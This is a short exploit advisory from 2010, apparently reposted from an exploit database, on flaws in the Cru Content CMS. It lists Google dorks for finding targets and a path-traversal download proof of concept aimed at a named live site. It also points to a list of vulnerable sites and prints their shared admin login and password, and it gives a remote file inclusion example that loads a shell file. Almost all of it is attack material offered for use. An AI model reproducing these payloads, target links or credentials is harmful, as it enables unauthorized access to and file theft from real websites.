Home / os / winme

Cru Content CMS remote file disclosure vulnerability

Posted on 06 March 2010

====================================================
Cru Content CMS remote file disclosure vulnerability
====================================================

[~]"Cru Content" Remote File Download Vulnerability
[~]CMS Site:crudigital.com.au<http://crudigital.com.au>
[~]Dork:"Powered By Cru Content"
[~]POC:www.cloudland.tv/cms/download.php?file=../index.php<http://www.cloudland.tv/cms/download.php?file=../index.php>
[~]Found by fx0

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

[~]This vuln is just pure human stupidity
[~]You can find vuln links here = http://www.warpstudio.com/hrvatski/reference/
[~]For every site the username and the password is the same
[~]Admin path /admin/
[~]Username:atila
[~]Password:bicbozji
[~]Found by fx0.

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

[~]Dork: inurl:".php?func=page_cms"
[~]Ex: www.site.com/index.php?func=<http://www.site.com/index.php?func=><shell.txt?>
[~]Found by fx0.


+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+



# ~  - [ [ : Inj3ct0r : ] ]

 

TOP